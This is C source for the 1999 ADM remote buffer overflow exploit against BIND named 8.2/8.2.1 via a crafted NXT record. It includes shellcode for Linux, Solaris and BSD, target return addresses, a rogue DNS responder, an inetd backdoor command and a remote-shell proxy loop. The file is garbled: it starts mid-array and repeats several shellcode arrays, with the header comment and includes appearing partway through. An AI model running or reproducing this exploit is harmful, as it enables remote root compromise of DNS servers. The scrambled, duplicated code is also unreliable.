0xcc,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10, 0x20,0x78,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0, 0x20,0x0,0x90,0x3,0xe0,0xd7,0x82,0x10,0x20,0xc,0x91,0xd0,0x20,0x0,0x90,0x3, 0xe0,0xd5,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0xa0,0x10,0x20,0x0,0x90, 0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,0x20,0x0,0xa0,0x4,0x20,0x1,0x80, 0xa4,0x20,0x1e,0x4,0xbf,0xff,0xfb,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xc0,0xa0, 0x3,0xe0,0xc5,0xe0,0x23,0xbf,0xf0,0xa0,0x3,0xe0,0xc9,0xe0,0x23,0xbf,0xf4, 0xa0,0x3,0xe1,0x5,0xe0,0x23,0xbf,0xf8,0xc0,0x23,0xbf,0xfc,0x92,0x3,0xbf,0xf0, 0x94,0x3,0xbf,0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x0,0x81,0xc3,0xe0,0x8, 0x1,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x6b,0x73,0x68,0x0,0x2d,0x63,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x0,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x68,0x6f,0x72,0x69,0x7a,0x6f, 0x6e,0x5b,0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x0}; char bsdcode[]= {0xe9,0xd4,0x1,0x0,0x0,0x5e,0x31,0xc0,0x50,0x50,0xb0,0x17,0xcd,0x80,0x31,0xc0, 0x50,0x50,0x56,0x50,0xb0,0x5,0xcd,0x80,0x89,0x46,0x28,0xb9,0xff,0x1,0x0,0x0, 0x51,0x8d,0x46,0x2,0x50,0x50,0xb8,0x88,0x0,0x0,0x0,0xcd,0x80,0x8d,0x46,0x2, 0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0x8b,0x46,0x28,0x50,0x50,0xb8,0xa7, 0x0,0x0,0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0xb,0x50,0x50,0xb8,0xa6,0x0,0x0, 0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0x21,0x48,0x50,0x50,0xb8,0x3d,0x0,0x0,0x0, 0xcd,0x80,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,0x85,0xe6,0x0, 0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,0x2c,0x8d, 0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,0x52,0x50, 0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80, 0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x62,0x6c,0x61,0x68, 0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,0x79,0x65, 0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,0x75,0x63, 0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,0x6d,0x65, 0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,0x6c,0x63, 0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,0x74,0x68, 0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,0x70,0x65, 0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,0x68,0x73, 0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a, 0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,0x70,0x70, 0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,0x20,0x31, 0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x8d,0x46,0x4,0x50, 0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x83,0xf8, 0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,0x0,0x0,0x0,0xcd, 0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a, 0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,0x52,0x52,0xb8,0x5a, 0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,0x46,0x8d,0x56,0x38, 0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,0x34,0x50,0x8d,0x46, 0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,0xc1,0xfe,0xff,0xff, 0xe8,0xd2,0xff,0xff,0xff,0xe8,0x27,0xfe,0xff,0xff,0x2e,0x0,0x41,0x44,0x4d, 0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0x0,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x73,0x68,0x0,0x2d,0x63,0x0, 0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x59,0x4f,0x59,0x4f, 0x59,0x4f,0x0}; char bsdnochroot[]= {0xe9,0x79,0x1,0x0,0x0,0x5e,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf, 0x85,0xe6,0x0,0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46, 0x2c,0x8d,0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50, 0x52,0x50,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0, 0xcd,0x80,0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0x0,0x0,0x0,0x62,0x6c, 0x61,0x68,0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67, 0x79,0x65,0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65, 0x66,0x6f,0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72, 0x75,0x63,0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69, 0x6d,0x65,0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c, 0x6c,0x63,0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79, 0x74,0x68,0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f, 0x70,0x65,0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67, 0x68,0x73,0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75, 0x65,0x7a,0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61, 0x70,0x70,0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d, 0x20,0x31,0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x5e,0x8d, 0x46,0x4,0x50,0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80, 0x5a,0x83,0xf8,0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0, 0x0,0xcd,0x80,0x6a,0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2, 0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46, 0x46,0x8d,0x56,0x38,0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46, 0x34,0x50,0x8d,0x46,0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9, 0xc0,0xfe,0xff,0xff,0xe8,0xd2,0xff,0xff,0xff,0xe8,0x82,0xfe,0xff,0xff,0x2e, 0x0,0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x73,0x68, 0x0,0x2d,0x63,0x0,0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f, 0x59,0x4f,0x59,0x4f,0x59,0x4f,0x0}; struct arch { int id; char *name; char *code; int codesize; unsigned long safe; unsigned long ret; int length; }; struct arch archlist[] = { {1, "Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)", linuxcode, sizeof(linuxcode), 0, 0xbfffd6c3, 6500}, {2, "Linux SolarDiz's non-exec stack patch - named 8.2/8.2.1",linuxcode, sizeof(linuxcode), 0, 0x80f79ae, 6500}, {3, "Solaris 7 (0xff) - named 8.2.1", sc, sizeof(sc), 0xffbea738, 0xffbedbd0, 11000}, {4, "Solaris 2.6 - named 8.2.1", sc, sizeof(sc), 0xefffa000, 0xefffe5d0, 11000}, {5, "FreeBSD 3.2-RELEASE - named 8.2", bsdcode, sizeof(bsdcode), 1, 0xbfbfbdb8, 7000}, {6, "OpenBSD 2.5 - named 8.2", bsdcode, sizeof(bsdcode), 1, 0xefbfbb00, 7000}, {7, "NetBSD 1.4.1 - named 8.2.1", bsdnochroot, sizeof(bsdnochroot), 1, 0xefbfbb00, 7000}, {0, 0, 0, 0} }; int arch=0; char *command=0; /* these two dns routines from dspoof/jizz */ /* pull out a compressed query name */ char *dnssprintflabel(char *s, char *buf, char *p) { unsigned short i,len; char *b=NULL; len=(unsigned short)*(p++); while (len) { while (len >= 0xC0) { if (!b) b=p+1; p=buf+(ntohs(*((unsigned short *)(p-1))) & ~0xC000); len=(unsigned short)*(p++); } for (i=0;i>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob "); b=(unsigned long*)(a+4166); *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //i2 - significant *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //i5 - significant *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //o0 - significant *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //o2 - significant *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //o6 - significant *b++=htonl(archlist[arch].ret); //o7 - retaddr } } int form_response(HEADER *packet, char *buf) { char query[512]; int qtype; HEADER *dnsh; char *p; char *walker; memset(buf,0,sizeof(buf)); dnsh = (HEADER *) buf; dnsh->id = packet->id; dnsh->qr=1; dnsh->aa=1; dnsh->qdcount = htons(1); dnsh->ancount = htons(1); dnsh->arcount = htons(1); dnsh->rcode = 0; walker=(char*)(dnsh+1); p=dnssprintflabel(query, (char *)packet, (char*)(packet+1)); query[strlen(query) - 1] = 0; qtype=*((unsigned short *)p); printf("%s type=%d\n",query, ntohs(qtype)); /* first, the query */ walker=dnsaddlabel(walker, query); PUTSHORT(ntohs(qtype), walker); //PUTSHORT(htons(T_PTR), walker); PUTSHORT(1,walker); /* then, our answer */ /* query IN A 1.2.3.4 */ walker=dnsaddlabel(walker, query); PUTSHORT(T_A, walker); PUTSHORT(1, walker); PUTLONG(60*5, walker); PUTSHORT(4, walker); sprintf(walker,"%c%c%c%c",1,2,3,4); walker+=4; /* finally, we make named do something more interesting */ walker=dnsaddlabel(walker, query); PUTSHORT(T_NXT, walker); PUTSHORT(1, walker); PUTLONG(60*5, walker); /* the length of one label and our arbitrary data */ PUTSHORT(archlist[arch].length+7, walker); PUTSHORT(6, walker); sprintf(walker,"admadm"); walker+=6; PUTSHORT(0, walker); make_overflow(walker); walker+=archlist[arch].length; PUTSHORT(0, walker); return walker-buf; } #define max(x,y) ((x)>(y)?(x):(y)) int proxyloop(int s) { char snd[1024], rcv[1024]; fd_set rset; int maxfd, n; sleep(1); printf("Entering proxyloop..\n"); strcpy(snd, "cd /; uname -a; pwd; id;\n"); write(s, snd, strlen(snd)); for (;;) { FD_SET(fileno(stdin), &rset); FD_SET(s, &rset); maxfd = max(fileno(stdin), s) + 1; select(maxfd, &rset, NULL, NULL, NULL); if (FD_ISSET(fileno(stdin), &rset)) { bzero(snd, sizeof(snd)); fgets(snd, sizeof(snd) - 2, stdin); write(s, snd, strlen(snd)); } if (FD_ISSET(s, &rset)) { bzero(rcv, sizeof(rcv)); if ((n = read(s, rcv, sizeof(rcv))) == 0) exit(0); if (n < 0) { return -3; } fputs(rcv, stdout); } } return 0; } int main(int argc, char **argv) { int s, fromlen, res, sl, s2; struct sockaddr_in sa, from, to; char buf[16384]; char sendbuf[16384]; unsigned short ts; int i; if (argc<2) { fprintf(stderr,"Usage: %s architecture [command]\n", argv[0]); fprintf(stderr,"Available architectures:\n"); i=-1; while(archlist[++i].id) fprintf(stderr," %d: %s\n",archlist[i].id,archlist[i].name); exit(1); } arch=atoi(argv[1])-1; if (argc==3) command=argv[2]; if ((s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))==-1) { perror("socket"); exit(1); } bzero(&sa, sizeof sa); sa.sin_family=AF_INET; sa.sin_addr.s_addr=INADDR_ANY; sa.sin_port=htons(53); if (bind(s, (struct sockaddr *)&sa, sizeof(sa))==-1) { perror("bind"); exit(1); } do { fromlen=sizeof(from); if ((res=recvfrom(s, buf, sizeof buf, 0, (struct sockaddr *)&from, &fromlen)) == -1) { perror("recvfrom"); exit(1); } printf("Received request from %s:%d for ", inet_ntoa(from.sin_addr), ntohs(from.sin_port)); sl=form_response((HEADER *)buf,sendbuf); /* now lets connect to the nameserver */ bzero(&to, sizeof(to)); to.sin_family=AF_INET; to.sin_addr=from.sin_addr; to.sin_port=htons(53); if ((s2=socket(AF_INET, SOCK_STREAM, 0))==-1) { perror("socket"); exit(1); } if (connect(s2, (struct sockaddr *)&to, sizeof to)==-1) { perror("connect"); exit(1); } ts=htons(sl); write(s2,&ts,2); write(s2,sendbuf,sl); if (archlist[arch].safe>1) close(s2); } while (archlist[arch].safe>1); /* infinite loop for sparc */ proxyloop(s2); exit(1); } /* * ADM CONFIDENTIAL -- (ADM Confidential Restricted when * combined with the aggregated modules for this product) * OBJECT CODE ONLY SOURCE MATERIALS * (C) COPYRIGHT ADM Crew. 1999 * All Rights Reserved * * This module may not be used, published, distributed or archived without * the written permission of the ADM Crew. Please contact your local sales * representative. * * ADM named 8.2/8.2.1 NXT remote overflow - horizon/plaguez * * "a misanthropic anthropoid with nothing to say" * * thanks to stran9er for sdnsofw.c * * Intel exploitation is pretty straightforward.. should give you a remote * shell. The shellcode will break chroot, do a getpeername on all open * sockets, and dup to the first one that returns AFINET. It also forks and * runs a command in case the fd duping doesn't go well. Solaris/SPARC is a * bit more complicated.. we are going through a well trodden part of the * code, so we don't get the context switch we need to have it populate the * register windows from the stack. However, if you just hammer the service * with requests, you will quickly get a context switch at the right time. * Thus, the SPARC shellcode currently only breaks chroot, closes current * fd's and runs a command. * Also, the NetBSD shellcode doesn't break chroot because they stop the * dir tricks. Of course, they allow mknods in chrooted environments, so * if named is running as root, then it still might be expoitable. * The non-exec stack patch version returns into a malloc'ed buffer, whose * address can vary quite alot. Thus, it may not be as reliable as the other * versions.. * * We broke this just a little in order to raise the bar on using it * (just slightly).. If you'd like to test it on your own box, put a shell * in /adm/sh, or /adm/ksh for solaris on the target machine. */ #include #include #include #include #include #include #include #include #include #include #include #include #include char linuxcode[]= {0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x46,0x8,0x89,0x46,0x10,0x8d, 0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,0xf3,0xb9,0x0,0x0,0x0,0x0, 0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x80,0x50,0x8d,0x5e,0x2,0xb9, 0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0x2,0xb8,0x3d,0x0, 0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0,0xcd,0x80,0x5b,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0x0,0x0,0xcd,0x80,0x89,0xf3, 0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa7,0xff,0xff,0xff,0x2e,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x89, 0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3,0x8d,0x4e,0xc,0x8d,0x56, 0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,0xe8,0x75, 0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x68,0x69,0x73,0x69,0x73, 0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e,0x61,0x64,0x64,0x72,0x69, 0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69,0x6b,0x6e,0x6f,0x77,0x74, 0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62,0x75,0x74,0x61,0x6e,0x79, 0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65,0x73,0x68,0x6f,0x72,0x69, 0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f,0x72,0x6b,0x69,0x6e,0x67, 0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f,0x6c,0xeb,0x86,0x5e,0x56, 0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x4,0x89,0xe1,0xbb,0x7,0x0, 0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4,0xc,0x89,0xc0,0x85,0xc0, 0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x56,0x4,0x4a,0x52,0x89,0xd3, 0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0xeb,0x12,0x5e,0x46, 0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0,0xe9,0xfe,0xfe,0xff,0xff, 0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff,0x2f,0x61,0x64,0x6d,0x2f, 0x73,0x68,0x0,0x2d,0x63,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,0x5b, 0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x2d}; char sc[]= {0x40,0x0,0x0,0x2e,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xd5,0x92,0x10,0x20,0x0, 0x82,0x10,0x20,0x5,0x91,0xd0,0x20,0x0,0xa0,0x10,0x0,0x8,0x90,0x3,0xe0,0xcc, 0x92,0x10,0x21,0xff,0x82,0x10,0x20,0x50,0x91,0xd0,0x20,0x0,0x90,0x3,0xe0, 0xcc,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10, 0x20,0x78,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0, 0x20,0x0,0x90,0x3,0xe0,0xd7,0x82,0x10,0x20,0xc,0x91,0xd0,0x20,0x0,0x90,0x3, 0xe0,0xd5,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0xa0,0x10,0x20,0x0,0x90, 0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,0x20,0x0,0xa0,0x4,0x20,0x1,0x80, 0xa4,0x20,0x1e,0x4,0xbf,0xff,0xfb,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xc0,0xa0, 0x3,0xe0,0xc5,0xe0,0x23,0xbf,0xf0,0xa0,0x3,0xe0,0xc9,0xe0,0x23,0xbf,0xf4, 0xa0,0x3,0xe1,0x5,0xe0,0x23,0xbf,0xf8,0xc0,0x23,0xbf,0xfc,0x92,0x3,0xbf,0xf0, 0x94,0x3,0xbf,0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x0,0x81,0xc3,0xe0,0x8, 0x1,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x6b,0x73,0x68,0x0,0x2d,0x63,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x0,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e, 0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x68,0x6f,0x72,0x69,0x7a,0x6f, 0x6e,0x5b,0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x0}; char bsdcode[]= {0xe9,0xd4,0x1,0x0,0x0,0x5e,0x31,0xc0,0x50,0x50,0xb0,0x17,0xcd,0x80,0x31,0xc0, 0x50,0x50,0x56,0x50,0xb0,0x5,0xcd,0x80,0x89,0x46,0x28,0xb9,0xff,0x1,0x0,0x0, 0x51,0x8d,0x46,0x2,0x50,0x50,0xb8,0x88,0x0,0x0,0x0,0xcd,0x80,0x8d,0x46,0x2, 0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0x8b,0x46,0x28,0x50,0x50,0xb8,0xa7, 0x0,0x0,0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0xb,0x50,0x50,0xb8,0xa6,0x0,0x0, 0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0x21,0x48,0x50,0x50,0xb8,0x3d,0x0,0x0,0x0, 0xcd,0x80,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,0x85,0xe6,0x0, 0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,0x2c,0x8d, 0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,0x52,0x50, 0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80, 0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x62,0x6c,0x61,0x68, 0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,0x79,0x65, 0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,0x75,0x63, 0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,0x6d,0x65, 0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,0x6c,0x63, 0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,0x74,0x68, 0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,0x70,0x65, 0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,0x68,0x73, 0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a, 0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,0x70,0x70, 0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,0x20,0x31, 0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x8d,0x46,0x4,0x50, 0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x83,0xf8, 0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,0x0,0x0,0x0,0xcd, 0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a, 0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,0x52,0x52,0xb8,0x5a, 0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,0x46,0x8d,0x56,0x38, 0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,0x34,0x50,0x8d,0x46, 0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,0xc1,0xfe,0xff,0xff, 0xe8,0xd2,0xff,0xff,0xff,0xe8,0x27,0xfe,0xff,0xff,0x2e,0x0,0x41,0x44,0x4d, 0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0x0,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x73,0x68,0x0,0x2d,0x63,0x0, 0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x59,0x4f,0x59,0x4f, 0x59,0x4f,0x0}; char bsdnochroot[]= {0xe9,0x79,0x1,0x0,0x0,0x5e,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf, 